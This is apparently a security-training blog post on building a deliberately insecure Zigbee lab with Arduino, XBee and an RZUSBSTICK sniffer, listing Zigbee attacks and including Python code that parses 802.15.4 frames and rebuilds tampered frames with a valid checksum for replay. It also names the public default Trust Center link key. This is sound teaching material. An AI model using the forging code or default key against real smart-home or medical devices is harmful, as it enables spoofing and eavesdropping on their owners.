Zigbee security and exploitation for IoT devices

Written by | Internet of Things, Security, Training


While working on our training material for the Offensive IoT Exploitation course, we here at Attify did a ton of in-depth research into all the possible aspects of IoT devices. One of the components we focused on primarily in radio-based exploitation was Zigbee security, as Zigbee is arguably the most popular IoT radio communication protocol in smart homes and medical devices.

Introduction to Zigbee

Zigbee is one of the most common communication protocols found in smart home devices and several other categories of IoT devices. Its extremely power-efficient nature, mesh networking and ease of use make Zigbee a popular choice among manufacturers.

It is a specification built on top of IEEE 802.15.4, which supplies the physical and MAC layers; Zigbee adds the network (NWK) and application (APS) layers on top, including the AES-128 based security at those layers. It is an open protocol created by the member companies of the Zigbee Alliance, which include TI, Silicon Labs, Philips and many others.

There have been a number of iterations of the Zigbee protocol, the most recent at the time of writing being Zigbee 3.0.   

Attacks possible  

Zigbee, being a radio communication protocol, suffers from the standard radio-based vulnerabilities. Some of the attacks possible against Zigbee communications are:

  1. Sniffing the data being transmitted (anything not encrypted at the NWK or APS layer is readable by any 802.15.4 receiver tuned to the same channel)
  2. Replaying captured packets to perform malicious actions (trivial when NWK security is off, as in the lab below; with security on, the receiver is supposed to reject frames whose frame counter does not increase, so replay then depends on that check being missing or weak)
  3. Sniffing the network key during the initial join: in the Zigbee Home Automation profile the network key is delivered to a joining device encrypted with a default global Trust Center link key, ZigBeeAlliance09, which is public knowledge, so a sniffer that catches the join can decrypt everything that follows (Zigbee 3.0 install codes are meant to close this gap)
  4. Modifying captured packets and then replaying them
  5. Spoofing-based attacks
  6. Denial of service

This blog post is an introductory guide to set things up in case you would like to learn Zigbee exploitation on your own and perform additional exploitation of each of the vulnerabilities mentioned above.

Hardware Required

Before reading the hardware section, bear in mind that this is just one of the possible combinations you could use to get started with Zigbee security. There are innumerable hardware options, such as a Zigbee dev kit, a commercial IoT device emitting Zigbee signals, and so on.

Below is a simple setup which you can get started with:

  1. Arduino Uno/Nano
  2. Digi XBee module (sold by DigiKey and others) / Arduino XBee shield
  3. Atmel RZUSBSTICK (the USB stick from the RZRAVEN kit)
  4. Attify Badge

Arduino: Arduino is the de-facto board for getting started with any sort of electronics project. Chances are high that you have used one at university or in high school. The Nano is the smaller of the two, but more than sufficient for our purposes.

Digi XBee module / XBee shield: In order to learn Zigbee, you need something that can transmit and receive on 802.15.4. The XBee is a transceiver (half duplex over the air, like every 802.15.4 radio) that communicates wirelessly with other XBee modules. Check which firmware your module runs before you start: an XBee 802.15.4 (Series 1) module speaks plain IEEE 802.15.4 point-to-multipoint, which is what the sniffing and replay steps below need, while an XBee ZB (Series 2) module speaks the full Zigbee stack including mesh networking, and the two are not interoperable over the air.

Atmel RZUSBSTICK (the “RzRaven” USB stick): This is the half-duplex module which performs the “magic” of sniffing and transmitting modified captured Zigbee packets. Flashed with the KillerBee firmware it works with the KillerBee tool suite (zbid, zbstumbler, zbdump, zbreplay and friends). If you’re familiar with other sorts of radio exploitation, consider this the “HackRF for Zigbee”.

Attify Badge: You can use this to program the XBee module with XCTU by plugging the badge into your system, because the XBee usually doesn’t have a mini USB or similar port that you could plug in directly to program it. In case you don’t have an Attify Badge or similar hardware, head out to Amazon or your local store and order a mini USB kit for the XBee, something like the board pictured below.

MiniUSB board for Xbee (img src : robosavvy.com)


Or you can order the Attify Badge by emailing us.


For programming and hardware connections, it’s pretty straightforward in this case: connect power to power, GND to GND, TX to RX and RX to TX. Two things to check in the datasheet of the XBee version you have are the pinout and the supply voltage. The XBee runs on 3.3 V and its pins are not 5 V tolerant, so on a 5 V Arduino Uno or Nano go through a shield or adapter that does the level shifting rather than wiring the module straight to the board.

Programming Arduino and Xbee

Programming Arduino

In order to program the Arduino, simply download and open the Arduino IDE from https://www.arduino.cc/en/Main/Software . Once it has loaded, open the hub and node programs from Attify’s GitHub repo and flash each of them to its own Arduino, one after the other.

The code is annotated with inline comments to help you understand what it does. On an additional note, the sample code also reads temperature, humidity and light values from sensors and uses the DHT library. It is perfectly fine to do the entire analysis and exploitation with a hardcoded string being transmitted instead of the DHT values; if you would rather use the code as it is, make sure to buy the DHT11 and the additional parts that go with it.

Tools needed

Node code:

Hub code:

Also below are the schematics in case you want to build an identical setup to our starting kit:

Node Schematics:

Node Schematics for Zigbee vulnerable setup

Hub Schematics:

Hub Schematics for Zigbee vulnerable setup

Once you have programmed both the Arduinos, the next step is to configure the Xbees using XCTU.

Programming Xbee

Launch XCTU and click on Discover Radio modules. It’ll show you the list of available COM ports where devices have been plugged in. Select the one which corresponds to the Xbee module (or select all in case you are not quite sure).

The additional configuration will be 8N1 as always: 8 data bits, no parity bit and 1 stop bit. You also need to specify the baud rate of your XBee module. If you don’t know which baud rate your module is using, select all baud rates and XCTU will scan each of them and find the correct one for you.

Once you hit Finish searching for the module, it will identify the device. Click on Add the Device.

Device being identified in XCTU

At this step you will be shown the various parameters of the device, including the channel number and the PAN ID, the two that matter to us at the moment. Almost all Zigbee products use the 2.4 GHz band, where IEEE 802.15.4 defines 16 channels (numbered 11 to 26), spaced 5 MHz apart starting at 2405 MHz and each occupying about 2 MHz of bandwidth; the sub-GHz bands have far fewer channels. A list of all the Zigbee channels can be found here. The PAN ID is a 16-bit identifier shared by every device on a network and carried in every 802.15.4 frame, which is also what lets a sniffer pick one network’s traffic out of a busy channel.

Set the channel and PAN ID to any value you like; the only requirement is that the other XBee has the same channel and PAN ID. On an XBee 802.15.4 module these are the CH and ID parameters; on XBee ZB firmware the coordinator picks its channel from the SC scan mask, so set ID and SC instead. Leave encryption (the EE/KY parameters) disabled for now: that is what makes this lab sniffable and replayable, and enabling it later with a 128-bit key is a quick way to see which of the attacks listed above still work.
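To make the attack list above and the channel/PAN ID discussion concrete, here is an added example, written for this post and not taken from Attify’s repository or from the XBee or KillerBee tools: a small Python decoder for the IEEE 802.15.4 MAC layer that a sniffer such as the RZUSBSTICK hands you, with the FCS check a receiver performs, a PAN ID filter (attack 1) and the rebuild-with-fresh-FCS step that attack 4 (modify and replay) depends on. The node and hub addresses, PAN ID, sequence numbers and sensor payloads are constructed for illustration; only the frame layout, the FCS algorithm and the channel numbering come from IEEE 802.15.4.

```python
"""IEEE 802.15.4 MAC-layer helpers for the Zigbee lab (added example, not the post's code).

Only data frames with 16-bit (short) addressing are handled, which is what the
XBee lab traffic looks like once the 802.15.4 PHY header has been stripped.
"""
import struct

FRAME_TYPE_DATA = 0x1            # FCF bits 0-2
FCF_SECURITY_ENABLED = 0x0008    # bit 3
FCF_ACK_REQUEST = 0x0020         # bit 5
FCF_PAN_ID_COMPRESSION = 0x0040  # bit 6: source PAN ID omitted, same as destination
ADDR_MODE_SHORT = 0x2            # dest mode in bits 10-11, source mode in bits 14-15


def fcs16(data: bytes) -> int:
    """802.15.4 FCS: CRC-16, polynomial x^16+x^12+x^5+1 (0x1021), bit-reflected
    (0x8408), initial value 0, no final XOR; transmitted least significant byte first."""
    crc = 0
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = ((crc >> 1) ^ 0x8408) if crc & 1 else (crc >> 1)
    return crc


def channel_to_mhz(channel: int) -> int:
    """Centre frequency of a 2.4 GHz 802.15.4 channel (11..26): 5 MHz spacing from 2405 MHz."""
    if not 11 <= channel <= 26:
        raise ValueError("2.4 GHz channels are numbered 11 to 26")
    return 2405 + 5 * (channel - 11)


def build_data_frame(seq: int, pan_id: int, dst: int, src: int, payload: bytes,
                     ack_request: bool = True) -> bytes:
    """MAC header (FCF, sequence number, PAN ID, dest, source) + payload + FCS."""
    fcf = (FRAME_TYPE_DATA | FCF_PAN_ID_COMPRESSION
           | (ADDR_MODE_SHORT << 10) | (ADDR_MODE_SHORT << 14))
    if ack_request:
        fcf |= FCF_ACK_REQUEST
    body = struct.pack("<HBHHH", fcf, seq & 0xFF, pan_id, dst, src) + payload
    return body + struct.pack("<H", fcs16(body))


def parse_data_frame(frame: bytes) -> dict:
    """Decode the MAC header and verify the FCS. Everything after the header is
    returned as opaque payload (for real Zigbee traffic that is the NWK frame)."""
    if len(frame) < 11:
        raise ValueError("frame too short for a short-addressed data frame")
    body, fcs = frame[:-2], struct.unpack("<H", frame[-2:])[0]
    fcf, seq = struct.unpack_from("<HB", body, 0)
    if ((fcf & 0x7) != FRAME_TYPE_DATA or ((fcf >> 10) & 0x3) != ADDR_MODE_SHORT
            or ((fcf >> 14) & 0x3) != ADDR_MODE_SHORT):
        raise ValueError("only data frames with 16-bit addressing are handled here")
    offset = 3
    dst_pan, dst = struct.unpack_from("<HH", body, offset)
    offset += 4
    if fcf & FCF_PAN_ID_COMPRESSION:
        src_pan = dst_pan
    else:
        src_pan = struct.unpack_from("<H", body, offset)[0]
        offset += 2
    src = struct.unpack_from("<H", body, offset)[0]
    offset += 2
    return {
        "seq": seq, "dst_pan": dst_pan, "dst": dst, "src_pan": src_pan, "src": src,
        "ack_request": bool(fcf & FCF_ACK_REQUEST),
        "security_enabled": bool(fcf & FCF_SECURITY_ENABLED),
        "payload": body[offset:],
        "fcs_ok": fcs16(body) == fcs,
    }


def frames_for_pan(capture, pan_id: int) -> list:
    """Attack 1: keep only FCS-valid frames addressed to the PAN we are interested in."""
    return [f for f in (parse_data_frame(raw) for raw in capture)
            if f["fcs_ok"] and f["dst_pan"] == pan_id]


def tamper_payload(frame: bytes, new_payload: bytes) -> bytes:
    """Attack 4: patching payload bytes in a capture leaves a stale FCS that the
    receiver silently drops, so the frame has to be rebuilt with a fresh one."""
    f = parse_data_frame(frame)
    return build_data_frame(f["seq"], f["dst_pan"], f["dst"], f["src"],
                            new_payload, f["ack_request"])


# Constructed sample traffic (made-up addresses): node 0x0002 reports to hub 0x0001
# on PAN 0x1234, plus one frame from a neighbouring PAN that the filter should ignore.
SAMPLE_FRAME = build_data_frame(0x2A, 0x1234, 0x0001, 0x0002, b"T=24.5,H=40")
OTHER_PAN_FRAME = build_data_frame(0x07, 0xBEEF, 0x0001, 0x0009, b"hello")
CAPTURE = [SAMPLE_FRAME, OTHER_PAN_FRAME]

if __name__ == "__main__":
    for f in frames_for_pan(CAPTURE, 0x1234):
        print(f"seq={f['seq']:#04x} {f['src']:#06x}->{f['dst']:#06x} {f['payload']!r}")
    forged = tamper_payload(SAMPLE_FRAME, b"T=99.0,H=40")
    print("forged frame FCS valid:", parse_data_frame(forged)["fcs_ok"])
    print("channel 15 is", channel_to_mhz(15), "MHz")
```

The first two bytes of SAMPLE_FRAME are 61 88, the FCF value 0x8861 you will see on almost every Zigbee data frame in Wireshark (data frame, ack requested, PAN ID compression, short source and destination). In real Zigbee traffic the payload this parser returns starts with a NWK header and, if the network key is in use, an AES-CCM* protected body; on the lab XBees with encryption off it is the sensor string itself, which is exactly why replay and tampering are worth trying there first.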

Xbee properties in XCTU

That is all that is required to complete the setup of the vulnerable Zigbee lab. In the upcoming blog posts on Zigbee we will look at exploitation techniques we can perform on this setup, and also take control of a commercial device emitting Zigbee signals.

If you would like to know more about IoT Exploitation techniques, attend one of our public training or sign up for the online course at SecurityTube.

Last modified: February 7, 2017
